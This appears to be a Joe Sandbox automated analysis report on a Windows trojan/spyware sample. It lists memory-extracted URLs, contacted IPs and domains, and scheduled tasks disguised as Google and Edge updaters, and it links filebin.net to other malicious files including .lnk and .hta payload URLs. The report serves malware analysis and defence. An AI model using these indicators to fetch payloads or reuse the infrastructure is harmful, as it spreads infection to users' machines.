https://duckduckgo.com/chrome_newtab	vbc.exe, 00000002.00000002.427871632.0000000007C29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.400435278.0000000006BF3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.394723661.0000000006B62000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429078081.0000000007CA7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434272795.0000000007E9A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.427645718.0000000007C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425239475.0000000007B5B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423608515.0000000007AFA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425702856.0000000007B78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423333203.0000000007ADD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413447497.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.433443830.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.428804002.0000000007C8A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12Response	vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://filebin.net	vbc.exe, 00000002.00000002.419324867.0000000006F3B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://ns.ado/1.0/s6c	vbc.exe, 00000002.00000002.381153178.0000000000C76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/1	GoogleUpdate.exe, 00000035.00000002.585478292.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/api/proxy/nodes/getzVjs	GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id9	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8	vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id7	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id6	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id19Response	vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.peer2profit.com/a	GoogleUpdate.exe, 00000035.00000003.449376913.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id22ResponselE	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id15Response	vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6Response	vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.peer2profit.com/api/proxy/nodes/get6	GoogleUpdate.exe, 00000035.00000003.451056579.00000000009CC000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000035.00000003.449376913.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.sb/ip	6iWK0k820U.exe, 6iWK0k820U.exe, 00000000.00000000.254324630.000000000041C000.00000004.00000001.01000000.00000003.sdmp, 6iWK0k820U.exe, 00000000.00000003.252173765.0000000000522000.00000040.00001000.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://ns.adoboshop/Wd	vbc.exe, 00000002.00000002.381153178.0000000000C76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.idpminic.org45k	vbc.exe, 00000002.00000002.419100995.0000000006F16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/sc	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id9Response	vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://filebin.net	vbc.exe, 00000002.00000002.419324867.0000000006F3B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get(	GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id20	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id21	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id23	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24Response	vbc.exe, 00000002.00000002.419642930.0000000006F5E000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id1Response	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=	vbc.exe, 00000002.00000002.427871632.0000000007C29000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.400435278.0000000006BF3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.394723661.0000000006B62000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429078081.0000000007CA7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434272795.0000000007E9A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.427645718.0000000007C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425239475.0000000007B5B000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423608515.0000000007AFA000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.425702856.0000000007B78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.423333203.0000000007ADD000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413447497.0000000006E26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.433443830.0000000007E39000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.428804002.0000000007C8A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.434598002.0000000007EB7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.408564118.0000000006D0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.410988860.0000000006D99000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.405855785.0000000006C7F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.429964631.0000000007D08000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/08/addressing	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.idpminic.orgD85k	vbc.exe, 00000002.00000002.418885129.0000000006F04000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/trust	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id11	vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id12	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16Response	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id13	vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id14	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id15	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id16	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id17	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/getX0	GoogleUpdate.exe, 00000035.00000002.580799994.000000000095B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id18	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id5Response	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id19	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.peer2profit.com/api/proxy/nodes/get9	GoogleUpdate.exe, 00000035.00000002.585478292.00000000009CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	vbc.exe, 00000002.00000002.394017297.0000000006B3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	vbc.exe, 00000002.00000002.392582887.0000000006AF2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id8Response	vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.389563030.0000000006A61000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.idpminic.org	vbc.exe, 00000002.00000002.418885129.0000000006F04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.418417866.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419100995.0000000006F16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.419158929.0000000006F28000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.413589541.0000000006E33000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.47.40.36	filebin.net	Norway	39029	REDPILL-LINPRORedpillLinproNO	false
172.66.43.60	api.peer2profit.com	United States	13335	CLOUDFLARENETUS	true
51.195.77.208	unknown	France	16276	OVHFR	false
37.220.87.2	unknown	Russian Federation	41070	ARTEM-CATV-ASRU	true
66.235.200.147	idpminic.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	753184
Start date and time:	2022-11-24 12:18:19 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	6iWK0k820U.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	58
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@88/23@8/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 62.2% (good quality ratio 54.2%) Quality average: 71.5% Quality standard deviation: 34.2%
HCA Information:	Successful, ratio: 99% Number of executed functions: 48 Number of non-executed functions: 105
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): WerFault.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, watson.telemetry.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:19:24	API Interceptor	1x Sleep call for process: WerFault.exe modified
12:19:56	API Interceptor	83x Sleep call for process: vbc.exe modified
12:20:00	API Interceptor	1x Sleep call for process: brave.exe modified
12:20:05	Task Scheduler	Run new task: MicrosoftEdge{e60e5877-76e2-4b84-98a8-90161a4b47ca} path: C:\Users\user\AppData\Local\Google\ofg.exe
12:20:05	API Interceptor	153x Sleep call for process: powershell.exe modified
12:20:11	API Interceptor	3x Sleep call for process: chrome.exe modified
12:20:14	Task Scheduler	Run new task: GoogleUpdateTask{56c41dbe-92cb-4ab7-b423-bd40cb65f9fe} path: C:\Users\user\AppData\Local\Google\chrome.exe
12:20:28	Task Scheduler	Run new task: GoogleUpdateTaskUAC{0625ad4f-50a5-4d12-b200-288d853de0d5} path: C:\Users\user\AppData\Local\Google\chrome.exe
12:20:37	API Interceptor	606x Sleep call for process: GoogleUpdate.exe modified
12:21:17	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.47.40.36	http://filebin.net/bxrgfgeddbwwntr9/U703.lnk	Get hash	malicious	Browse	filebin.net/bxrgfgeddbwwntr9/U703.lnk

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
filebin.net	menu.exe	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	185.47.40.36
	LRFo5PcmB1.exe	Get hash	malicious	Browse	185.47.40.36
	m8IAF198uJ.exe	Get hash	malicious	Browse	185.47.40.36
	ZEWmK10Dl2.exe	Get hash	malicious	Browse	185.47.40.36
	3x2KyUuoL5.exe	Get hash	malicious	Browse	185.47.40.36
	https://filebin.net/njqyvfot61w0tu9a/ordr.hta	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	185.47.40.36
	QOeIjCvbQW.exe	Get hash	malicious	Browse	185.47.40.36
	I9qEeGefke.exe	Get hash	malicious	Browse	185.47.40.36
	C538GKLz4o.exe	Get hash	malicious	Browse	185.47.40.36
	0R3yD9EU5T.exe	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	185.47.40.36
	4ELGzHRPnK.exe	Get hash	malicious	Browse	185.47.40.36
	Hotel Managemente.exe	Get hash	malicious	Browse	185.47.40.36
	cZZN0S6G3B.exe	Get hash	malicious	Browse	185.47.40.36

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
REDPILL-LINPRORedpillLinproNO	menu.exe	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	185.47.40.36
	ZEWmK10Dl2.exe	Get hash	malicious	Browse	87.238.33.7
	3x2KyUuoL5.exe	Get hash	malicious	Browse	87.238.33.7
	https://filebin.net/njqyvfot61w0tu9a/ordr.hta	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	87.238.33.7
	file.exe	Get hash	malicious	Browse	87.238.33.8
	file.exe	Get hash	malicious	Browse	87.238.33.7
	file.exe	Get hash	malicious	Browse	87.238.33.7
	QOeIjCvbQW.exe	Get hash	malicious	Browse	87.238.33.7
	I9qEeGefke.exe	Get hash	malicious	Browse	185.47.40.36
	C538GKLz4o.exe	Get hash	malicious	Browse	185.47.40.36
	0R3yD9EU5T.exe	Get hash	malicious	Browse	185.47.40.36
	file.exe	Get hash	malicious	Browse	87.238.33.8
	Hotel Managemente.exe	Get hash	malicious	Browse	185.47.40.36
	cZZN0S6G3B.exe	Get hash	malicious	Browse	185.47.40.36
	All.arm7.elf	Get hash	malicious	Browse	87.238.54.2
	biin.exe	Get hash	malicious	Browse	87.238.33.7
	file.exe	Get hash	malicious	Browse	185.47.40.36
	EqOK5YYw3O.exe	Get hash	malicious	Browse	185.47.40.36

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

